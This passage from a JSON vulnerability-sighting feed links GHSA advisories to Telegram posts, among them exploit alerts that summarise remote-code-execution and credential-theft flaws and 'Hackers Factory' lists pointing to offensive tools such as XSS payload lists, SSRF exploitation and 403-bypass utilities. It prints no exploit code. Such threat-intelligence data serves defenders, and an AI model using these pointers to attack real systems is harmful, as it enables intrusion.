"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W9CP-3X79-2P8P", "type": "seen", "source": "https://t.me/arpsyndicate/297", "content": "#ExploitObserverAlert\n\nGHSA-w9cp-3x79-2p8p\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-W9CP-3X79-2P8P. Unsafe YAML deserialization in yaml.Loader in transmute-core before 1.13.5 allows attackers to execute arbitrary Python code.\n\nGHSS: 9.8", "creation_timestamp": "2023-11-20T16:10:52.000000Z"}, {"uuid": "5fd121be-22ae-4499-abf7-d34471918171", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PV7F-H3W8-W3JH", "type": "seen", "source": "https://t.me/arpsyndicate/288", "content": "#ExploitObserverAlert\n\nGHSA-pv7f-h3w8-w3jh\n\nDESCRIPTION: Exploit Observer has 5 entries related to GHSA-PV7F-H3W8-W3JH. Velneo vClient on its 28.1.3 version, does not correctly check the certificate of authenticity by default. This could allow an attacker that has access to the network to perform a MITM attack in order to obtain the user\u00b4s credentials.\n\nGHSS: 5.9", "creation_timestamp": "2023-11-20T12:19:04.000000Z"}, {"uuid": "6a9faa45-0296-4a93-b028-ee1d90ef7b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJQ6-PV9C-QPPQ", "type": "seen", "source": "https://t.me/arpsyndicate/287", "content": "#ExploitObserverAlert\n\nGHSA-mjq6-pv9c-qppq\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-MJQ6-PV9C-QPPQ. The vulnerability affects the endpoint /v2/pkgs/tools/installed and the way it handles plugin names supplied as user input.\nA user who has the ability to perform HTTP requests to the localhost interface, or is able to bypass the CORS configuration, can delete arbitrary files or folders belonging to the user that runs the Arduino Create Agent via a crafted HTTP DELETE request.\nFurther details are available in the references.\n\nGHSS: 6.1", "creation_timestamp": "2023-11-20T12:18:50.000000Z"}, {"uuid": "0afc0a69-e897-4055-8086-f6db73c06ebd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MWWQ-V92J-38XR", "type": "seen", "source": "https://t.me/arpsyndicate/773", "content": "#ExploitObserverAlert\n\nGHSA-mwwq-v92j-38xr\n\nDESCRIPTION: Exploit Observer has 8 entries related to GHSA-MWWQ-V92J-38XR. In Splunk Enterprise versions below 9.0.7 and 9.1.2, Splunk Enterprise does not safely sanitize extensible stylesheet language transformations (XSLT) that users supply. This means that an attacker can upload malicious XSLT which can result in remote code execution on the Splunk Enterprise instance.\n\nGHSS: 8.0", "creation_timestamp": "2023-11-29T16:58:47.000000Z"}, {"uuid": "741c2681-86a6-4b63-bee7-05fe3f5cffea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RR6C-95PP-CPGF", "type": "seen", "source": "https://t.me/arpsyndicate/698", "content": "#ExploitObserverAlert\n\nGHSA-rr6c-95pp-cpgf\n\nDESCRIPTION: Exploit Observer has 9 entries related to GHSA-RR6C-95PP-CPGF.\n\nGHSS: 7.5", "creation_timestamp": "2023-11-29T08:19:42.000000Z"}, {"uuid": "4858191f-1be5-40f7-9d91-463571b9bbe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7R43-V6HM-QRJH", "type": "seen", "source": "https://t.me/arpsyndicate/724", "content": "#ExploitObserverAlert\n\nGHSA-7r43-v6hm-qrjh\n\nDESCRIPTION: Exploit Observer has 3 entries related to GHSA-7R43-V6HM-QRJH. An insecure password reset issue discovered in MEGAFEIS, BOFEI DBD  Application for IOS", "creation_timestamp": "2023-11-29T11:22:18.000000Z"}, {"uuid": "50a6c67b-be59-433a-9b1d-db6a1a1139c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5J5P-CR5C-763J", "type": "seen", "source": "https://t.me/arpsyndicate/740", "content": "#ExploitObserverAlert\n\nGHSA-5j5p-cr5c-763j\n\nDESCRIPTION: Exploit Observer has 2 entries related to GHSA-5J5P-CR5C-763J. An issue was discovered in the pixxio (aka pixx.io integration or DAM) extension before 1.0.6 for TYPO3. The Access Control in the bundled media browser is broken, which allows an unauthenticated attacker to perform requests to the pixx.io API for the configured API user. This allows an attacker to download various media files from the DAM system.\n\nGHSS: 8.8", "creation_timestamp": "2023-11-29T13:16:15.000000Z"}, {"uuid": "e3bddd7c-3528-45ae-a0d5-0a5872b97ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WXV3-WWGP-8547", "type": "seen", "source": "https://t.me/arpsyndicate/716", "content": "#ExploitObserverAlert\n\nGHSA-wxv3-wwgp-8547\n\nDESCRIPTION: Exploit Observer has 1 entries related to GHSA-WXV3-WWGP-8547.\n\nGHSS: 5.4", "creation_timestamp": "2023-11-29T10:20:30.000000Z"}, {"uuid": "7fb6389c-50a5-4e5c-a80f-e4a57711aa56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6CM4-GM85-972C", "type": "seen", "source": "https://t.me/arpsyndicate/706", "content": "#ExploitObserverAlert\n\nGHSA-6cm4-gm85-972c\n\nDESCRIPTION: Exploit Observer has 6 entries related to GHSA-6CM4-GM85-972C. An issue was discovered in Cobbler through 3.3.0. In the templar.py file, the function check_for_invalid_imports can allow Cheetah code to import Python modules via the \"", "creation_timestamp": "2023-11-29T09:03:32.000000Z"}, {"uuid": "715c1b5b-7f0a-498e-83af-2df9c68d41eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQCX-CCGC-XWHV", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/16877", "content": "CVE-2023-3824 vulnerability .\n\nMore details: https://nvd.nist.gov/vuln/detail/CVE-2023-3824\n\nExploit: https://github.com/php/php-src/security/advisories/GHSA-jqcx-ccgc-xwhv", "creation_timestamp": "2024-04-05T21:43:54.000000Z"}, {"uuid": "5baa9fad-898f-4b4e-8531-c87b90d5f83d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94W9-97P3-P368", "type": "published-proof-of-concept", "source": "Telegram/lg9QsFi1Spa8jVI4aQSjOJlRVF7F9piakbWtsvMncKspuNm7rA", "content": "", "creation_timestamp": "2024-07-08T04:00:53.000000Z"}, {"uuid": "4df68e14-239c-4511-9098-620b593d9570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7PG-V2C8-MFG3", "type": "seen", "source": "https://t.me/nodejsleaks/1031", "content": "#news\n\nhttps://github.com/advisories/GHSA-r7pg-v2c8-mfg3\nA critical vulnerability, CVE-2024-47561, has been identified in the Apache Avro Java SDK, affecting all versions up to and including 1.11.3. This vulnerability allows an attacker to execute arbitrary code on systems parsing Avro data via a specially crafted schema. The root of the issue lies in the deserialization of untrusted data, a common flaw that can lead to remote code execution (RCE). This flaw could be exploited if an application processes malicious Avro schemas, potentially compromising the system entirely.\n\nThe vulnerability was discovered by Kostya Kortchinsky from the Databricks Security Team. Exploits could be launched through frameworks like Kafka or other data pipeline technologies relying on Avro schemas. Although no public proof-of-concept (PoC) has been released yet, this vulnerability poses a serious threat, especially to systems that allow users to upload or provide their own Avro schemas for parsing.\n\nMitigation steps include upgrading to version 1.11.4 or later, which patches the vulnerability, as well as employing schema sanitization and avoiding user-provided schemas wherever possible. It's essential that organizations prioritize patching to avoid security risks", "creation_timestamp": "2024-10-08T01:05:19.000000Z"}, {"uuid": "67b72bea-79bc-4091-9ba3-03a30d70cfb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3733-6V6M-39MH", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/158", "content": "Tools - Hackers Factory\n\nIt creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.\n\nhttps://github.com/Slowerzs/PPLSystem\n\nAgentic LLM Vulnerability Scanner \n\nhttps://github.com/msoedov/agentic_security\n\nA Chrome/Firefox browser extension to show alerts for reflected query params, show Wayback archive links for the current path, show hidden elements and enable disabled elements. \n\nhttps://github.com/msoedov/agentic_security\n\nPowerful+Fast Kubernetes service discovery tools via kubernetes DNS service. Currently supported service ip-port BruteForcing / AXFR Domain Transfer Dump / Coredns WildCard Dump \n\nhttps://github.com/Esonhugh/k8spider\n\nHTTP 403 bypass tool \n\nhttps://github.com/trap-bytes/403jump\n\n\nMOBEXLER - A Mobile Application Penetration Testing Platform\n\nhttps://github.com/enciphers-team/Mobexler/blob/master/docs/index.md\n\nA library for detecting known secrets across many web frameworks \n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nThe Yoast SEO plugin for WordPress is vulnerable to... \n\nhttps://github.com/advisories/GHSA-3733-6v6m-39mh\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nFuzz 401/403/404 pages for bypasses \n\nhttps://github.com/intrudir/BypassFuzzer\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nFully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. \n\nhttps://github.com/Syslifters/sysreptor\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:07:45.000000Z"}, {"uuid": "fc0b106a-60c5-48e7-8989-8a65201265e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/158", "content": "Tools - Hackers Factory\n\nIt creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.\n\nhttps://github.com/Slowerzs/PPLSystem\n\nAgentic LLM Vulnerability Scanner \n\nhttps://github.com/msoedov/agentic_security\n\nA Chrome/Firefox browser extension to show alerts for reflected query params, show Wayback archive links for the current path, show hidden elements and enable disabled elements. \n\nhttps://github.com/msoedov/agentic_security\n\nPowerful+Fast Kubernetes service discovery tools via kubernetes DNS service. Currently supported service ip-port BruteForcing / AXFR Domain Transfer Dump / Coredns WildCard Dump \n\nhttps://github.com/Esonhugh/k8spider\n\nHTTP 403 bypass tool \n\nhttps://github.com/trap-bytes/403jump\n\n\nMOBEXLER - A Mobile Application Penetration Testing Platform\n\nhttps://github.com/enciphers-team/Mobexler/blob/master/docs/index.md\n\nA library for detecting known secrets across many web frameworks \n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nThe Yoast SEO plugin for WordPress is vulnerable to... \n\nhttps://github.com/advisories/GHSA-3733-6v6m-39mh\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nFuzz 401/403/404 pages for bypasses \n\nhttps://github.com/intrudir/BypassFuzzer\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nFully customisable, offensive security reporting solution designed for pentesters, red teamers and other security-related people alike. \n\nhttps://github.com/Syslifters/sysreptor\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:07:45.000000Z"}, {"uuid": "68c8561a-8a7c-4353-ba1e-6559645cb827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/155", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:00:55.000000Z"}, {"uuid": "ba84acce-3840-4e31-8232-1541ac9f79de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/lcmysecteamch/4430", "content": "Tools - Hackers Factory\n\nCross Site Scripting ( XSS ) Vulnerability Payload List \n\nhttps://github.com/payloadbox/xss-payload-list\n\nYARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js \n\nhttps://github.com/spaceraccoon/detect-cve-2024-4367\n\nThe Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. \n\nhttps://github.com/0xInfection/XSRFProbe\n\nhttps://github.com/blacklanternsecurity/badsecrets\n\nAutomation for javascript recon in bug bounty. \n\nhttps://github.com/KathanP19/JSFScan.sh\n\nTempMail is a simple web application that allows you to generate temporary email addresses and view the emails received by these addresses. \n\nhttps://github.com/mehmetkahya0/temp-mail \n\nThis Repositories contains list of One Liners with Descriptions and Installation requirements \n\nhttps://github.com/thecybertix/One-Liner-Collections\n\nAutomatic SSRF fuzzer and exploitation tool \n\nhttps://github.com/swisskyrepo/SSRFmap\n\nA tool to fastly get all javascript sources/files \n\nhttps://github.com/003random/getJS\n\nServer-Side Request Forgery in Server Actions \n\nhttps://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g\n\nInQL is a robust, open-source Burp Suite extension for advanced GraphQL testing, offering intuitive vulnerability detection, customizable scans, and seamless Burp integration. \n\nhttps://github.com/doyensec/inql\n\n#HackersFactory", "creation_timestamp": "2024-05-25T15:33:16.000000Z"}, {"uuid": "eb7841c5-419a-4adb-b790-4431f7294298", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58VJ-CV5W-V4V6", "type": "published-proof-of-concept", "source": "Telegram/gDFVoHUuB6H--lSlEA0FwxdrgJcGZ12Usz4zXGcpZiimTGk", "content": "", "creation_timestamp": "2024-10-10T18:12:19.000000Z"}, {"uuid": "b2fba381-1e5f-46da-b2cc-9e9479c5a311", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HRQ-RF96-C2JM", "type": "published-proof-of-concept", "source": "Telegram/5ew9Gap99Vy6uWXSrRBjXFUkJcr3Aw_KhGVJpA-a9z6DOfY", "content": "", "creation_timestamp": "2025-04-20T02:54:44.000000Z"}, {"uuid": "815d14cb-342a-4d8c-a30a-fb08350ecdb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F69V-XRJ8-RHXF", "type": "published-proof-of-concept", "source": "Telegram/tGlnxgJ45kvnhr-0GuZEauiX58JIxK_MY4hRnR_Ek7fiyk0", "content": "", "creation_timestamp": "2025-04-23T20:32:34.000000Z"}, {"uuid": "ddfc2d51-ff69-4376-85a9-4d14ac48cbdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ36-MXF8-HV62", "type": "seen", "source": "Telegram/cYfPl4Qca19rkqt8FYd7E49qcDewBCCVh3ubWy62Agpv4JE", "content": "", "creation_timestamp": "2025-01-28T17:02:26.000000Z"}, {"uuid": "390404ee-0383-43ba-89f1-38c6df16e852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q2F9-X4P4-7XMH", "type": "seen", "source": "Telegram/5eBuvckgjMmUrrDTZuzRXBnI9rJEpd7_1eddmnGajLrVyIo", "content": "", "creation_timestamp": "2025-04-07T23:31:55.000000Z"}, {"uuid": "1acd65eb-313e-49e9-9696-f232bd2c2246", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MPV-9XG6-5R79", "type": "seen", "source": "Telegram/5eBuvckgjMmUrrDTZuzRXBnI9rJEpd7_1eddmnGajLrVyIo", "content": "", "creation_timestamp": "2025-04-07T23:31:55.000000Z"}, {"uuid": "5fb35fb3-372d-44c1-9862-261094508e1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94HH-JMQ8-2FGP", "type": "published-proof-of-concept", "source": "Telegram/5dAdkBrkgoCoPXtqjNJ6teSKY8EEieVK1jkeeM1fkZslcgw", "content": "", "creation_timestamp": "2025-04-07T23:31:54.000000Z"}, {"uuid": "3d2876e7-d65f-44ad-aceb-f478880960bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F42F-6FVV-XQX3", "type": "published-proof-of-concept", "source": "Telegram/9YoJkce8ZLrbJOFjVGYj1Vi2UBwBRdx3KAe6xADJGY12VGo", "content": "", "creation_timestamp": "2025-04-06T22:30:35.000000Z"}, {"uuid": "98a388cd-dee3-4743-a3f2-c4d1c67f120a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCRC-79HJ-M3QH", "type": "published-proof-of-concept", "source": "Telegram/pioHib2nR2XYsdiAWAKSjrwD2AgkHgdboZVz1fxlp4Zhpko", "content": "", "creation_timestamp": "2025-02-10T21:00:22.000000Z"}, {"uuid": "0c14491b-3de0-41f0-a046-7d2b4631db93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWJ2-W85G-5CMM", "type": "published-proof-of-concept", "source": "Telegram/MtkbMjKHSfcOGeyYZKODgJ22yCGfMFI_St_Qez5BgCNBgxs", "content": "", "creation_timestamp": "2025-05-06T21:30:42.000000Z"}, {"uuid": "ba2b0610-0230-4f62-951f-183aacefbef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CWJ7-6V67-2CM4", "type": "published-proof-of-concept", "source": "Telegram/MtkbMjKHSfcOGeyYZKODgJ22yCGfMFI_St_Qez5BgCNBgxs", "content": "", "creation_timestamp": "2025-05-06T21:30:42.000000Z"}, {"uuid": "e2d3277e-55a1-4ca7-b4c3-71fc0d2f90f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G4R8-MP7G-85FQ", "type": "seen", "source": "Telegram/PwjyiTDmMCV8n5O4H8WYZUui8x-G-PcEgC06QwyqI9Pyxio", "content": "", "creation_timestamp": "2025-05-06T20:30:48.000000Z"}, {"uuid": "54cb7d18-0288-4879-bb0e-d5f53cb3107a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9PCC-GVX5-R5WM", "type": "published-proof-of-concept", "source": "Telegram/Gr5A9z37UH1WrwsriSLeklpRtkMZp7Yqv-5xgG3MUvD57FE", "content": "", "creation_timestamp": "2025-05-06T19:30:34.000000Z"}, {"uuid": "00b889bd-3669-4dd0-a0b2-03612f7341e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WWX5-GPGR-VXR7", "type": "published-proof-of-concept", "source": "Telegram/VQDyMSiZHY5xvEKb4oih99dlPq4vD6lnAW-AaTy3B_GN-vo", "content": "", "creation_timestamp": "2025-01-28T17:02:25.000000Z"}, {"uuid": "314dfe78-4a83-42e8-9773-92a93a01120a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R6RJ-H75W-VJ8V", "type": "published-proof-of-concept", "source": "Telegram/VQDyMSiZHY5xvEKb4oih99dlPq4vD6lnAW-AaTy3B_GN-vo", "content": "", "creation_timestamp": "2025-01-28T17:02:25.000000Z"}, {"uuid": "6407fe7e-7ab8-47b7-9ca8-50eda345ea44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JRGJ-35JX-2QQ7", "type": "published-proof-of-concept", "source": "Telegram/VQDyMSiZHY5xvEKb4oih99dlPq4vD6lnAW-AaTy3B_GN-vo", "content": "", "creation_timestamp": "2025-01-28T17:02:25.000000Z"}, {"uuid": "713bc022-d057-4157-a355-dd32f146c5dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-56JP-J3X5-HH2W", "type": "published-proof-of-concept", "source": "Telegram/VQDyMSiZHY5xvEKb4oih99dlPq4vD6lnAW-AaTy3B_GN-vo", "content": "", "creation_timestamp": "2025-01-28T17:02:25.000000Z"}, {"uuid": "631c3983-433f-4613-9917-255deeb6b6ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PX83-72RX-V57C", "type": "seen", "source": "Telegram/6XDP4M1wkfL7m7vq90Tisvnt9Hir_tEqb2ho5KerLaKNi_8", "content": "", "creation_timestamp": "2025-05-06T04:01:13.000000Z"}, {"uuid": "c36af15e-c30f-4841-b5f4-768c7db373cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JRR2-X33P-6HVC", "type": "seen", "source": "Telegram/Gwvh-n-ygZ7AZvt4Z14lI64V1AihU4WxZxoYYl7z1l7jTPI", "content": "", "creation_timestamp": "2025-04-30T17:32:01.000000Z"}, {"uuid": "01f93429-c42c-4da7-9aca-504f56568766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5XV6-7JM3-FMG5", "type": "seen", "source": "Telegram/Gwvh-n-ygZ7AZvt4Z14lI64V1AihU4WxZxoYYl7z1l7jTPI", "content": "", "creation_timestamp": "2025-04-30T17:32:01.000000Z"}, {"uuid": "d409f059-e41f-4c92-a0de-68591d7fc2ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MVGM-3RW2-7J4R", "type": "seen", "source": "Telegram/Gwvh-n-ygZ7AZvt4Z14lI64V1AihU4WxZxoYYl7z1l7jTPI", "content": "", "creation_timestamp": "2025-04-30T17:32:01.000000Z"}, {"uuid": "d93e35bf-eaa4-4ae9-a276-0b3e8a60152c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WC9G-6J9W-HR95", "type": "published-proof-of-concept", "source": "Telegram/B0mQm7D6n4K45Tyxh70ZGq4-hSEsF9uB1DRvduugCcWcgHU", "content": "", "creation_timestamp": "2025-04-29T23:00:34.000000Z"}, {"uuid": "fac44b37-8cef-4f31-a137-3c958f08b559", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3M8-899R-F7C3", "type": "published-proof-of-concept", "source": "Telegram/pRPgTuKpNgH7y7yHOR5VIq4CCObEljNgHBGQunGS6T0fn0Q", "content": "", "creation_timestamp": "2025-03-14T19:00:48.000000Z"}, {"uuid": "4010c9e3-666e-4ef9-bbe0-248b5b762394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P8X-F768-WP2G", "type": "published-proof-of-concept", "source": "Telegram/pRPgTuKpNgH7y7yHOR5VIq4CCObEljNgHBGQunGS6T0fn0Q", "content": "", "creation_timestamp": "2025-03-14T19:00:48.000000Z"}, {"uuid": "e363c6be-2dcb-4429-bac7-e6d826c4292f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MWFG-948F-2CC5", "type": "published-proof-of-concept", "source": "Telegram/bFFhDRsz5jITaIYyr2g-Li8Bq5utseX25ZdPNGHsnlhVzGo", "content": "", "creation_timestamp": "2025-05-06T03:23:35.000000Z"}, {"uuid": "f589802a-d310-431b-b66a-c0f3485c4389", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6M8W-JC87-6CR7", "type": "published-proof-of-concept", "source": "Telegram/0EwG4WR3r_yD8YYpC8nymf37rvRJ9lNf57cFzRcn8wtN8JQ", "content": "", "creation_timestamp": "2025-05-01T22:01:57.000000Z"}, {"uuid": "0ab0a76e-8a9e-44a4-9265-bf89f63d10aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3P2W-XMV5-JM95", "type": "published-proof-of-concept", "source": "Telegram/bFFhDRsz5jITaIYyr2g-Li8Bq5utseX25ZdPNGHsnlhVzGo", "content": "", "creation_timestamp": "2025-05-06T03:23:35.000000Z"}, {"uuid": "aefcfa83-edff-4028-891e-fb70c99d0f15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-998C-X8HX-737R", "type": "published-proof-of-concept", "source": "Telegram/QFVP5TcYkEi5fC3DYhpbJ3tJ8sPusYmL1ImuYd1RRjGW6cE", "content": "", "creation_timestamp": "2025-05-01T20:00:50.000000Z"}, {"uuid": "cd85edb5-3df8-4314-a779-57a5a652176c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9F8F-2VMF-885J", "type": "published-proof-of-concept", "source": "Telegram/hbVDftoo7cklg62Gdj6otKY7hUkOaO8wH7xugOEL8u8l2Gc", "content": "", "creation_timestamp": "2025-04-30T03:30:38.000000Z"}, {"uuid": "fff76364-c120-4fc5-8930-f4b1fae7e6f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HJ4W-HM2G-P6W5", "type": "published-proof-of-concept", "source": "Telegram/hbVDftoo7cklg62Gdj6otKY7hUkOaO8wH7xugOEL8u8l2Gc", "content": "", "creation_timestamp": "2025-04-30T03:30:38.000000Z"}, {"uuid": "e18446ee-0d16-41ec-981b-695e4cb6a39d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3M8-F7G5-QHM7", "type": "published-proof-of-concept", "source": 